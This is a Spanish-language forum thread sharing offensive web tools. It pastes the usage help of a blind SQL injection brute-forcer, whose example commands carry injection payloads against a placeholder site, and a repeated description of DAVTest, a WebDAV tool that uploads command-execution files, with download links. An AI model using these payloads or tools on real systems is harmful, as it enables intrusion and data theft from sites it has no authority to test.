habia un script para blind sql que lo hizo codebreak pero ya no recuerdo donde estaba
te refieres a este ?Código:
______ _ _ ____ ___
| ___ \ (_) | | \/ |
| |_/ / |_ _ __ __| | . . | __ _ _ __
| ___ \ | | '_ \ / _` | |\/| |/ _` | '_ \
| |_/ / | | | | | (_| | | | | (_| | |_) |
\____/|_|_|_| |_|\__,_\_| |_/\__,_| .__/
| |
|_| Rev.4
~ [ www.codebreak.tk - codebreak1984 @gmail.com] ~
Blind SQL Mapper - For advanced SQL Injection
Works with all mysql versions. Just desing a valid query.
Coded by: Codebreak (a.k.a Codebreak1984)
Contact: codebreak1984 @gmail.com
-----------------------------------------------------------------------------
Usage: sql.exe -type host path injection check
type:
-column Will try to find valid columns using a wordlist.
-brute Will try to bruteforce your query.
-table Will bruteforce your query with a wordlist.
host: target server (ip or hostname)
path: vulnerable path, including script and variable
injection: a valid mysql query.
-[+] the incremental MID variable, in case of a true query.
-[char] the incremental char numbers to compare the column data.
-[word] You can test words from a wordlist. Nice to find tables.
check: A string shown in a valid query
Examples:
sql.exe -brute "www.injectme.com" "/guestbook/recorded/show.php?id=1" "+AND+ASCII(MID(column,[+],1))=[char]" "admin data"
sql.exe -column "www.injectme.com" "/news/news.php?id=1" "Ps3 released!" "wordlist.txt"
sql.exe -table "www.injectme.com" "/news/news.php?id=-1+UNION+SELECT+1,2,3,4,5+FROM+[word]" "Ps3 released!" "wordlist.txt"
-----------------------------------------------------------------------------
DAVTest: Quickly Test & Exploit WebDAV Servers
Citar
DAVTest tests WebDAV enabled servers by uploading test executable files, and then (optionally) uploading files which allow for command execution or other actions directly on the target. It is meant for penetration testers to quickly and easily determine if enabled DAV services are exploitable.
DAVTest supports:
* Automatically send exploit files
* Automatic randomization of directory to help hide files
* Send text files and try MOVE to executable name
* Basic and Digest authorization
* Automatic clean-up of uploaded files
* Send an arbitrary file
DAVTest supports:
* Automatically send exploit files
* Automatic randomization of directory to help hide files
* Send text files and try MOVE to executable name
* Basic and Digest authorization
* Automatic clean-up of uploaded files
* Send an arbitrary file
Download : http://code.google.com/p/davtest/
http://code.google.com/p/davtest/downloads/list
Descarga directa : http://code.google.com/p/davtest/downloads/list
Mas información :
http://www.darknet.org.uk/2010/04/davtest-webdav-vulerability-scanning-scanner-tool/ o la pagina principal.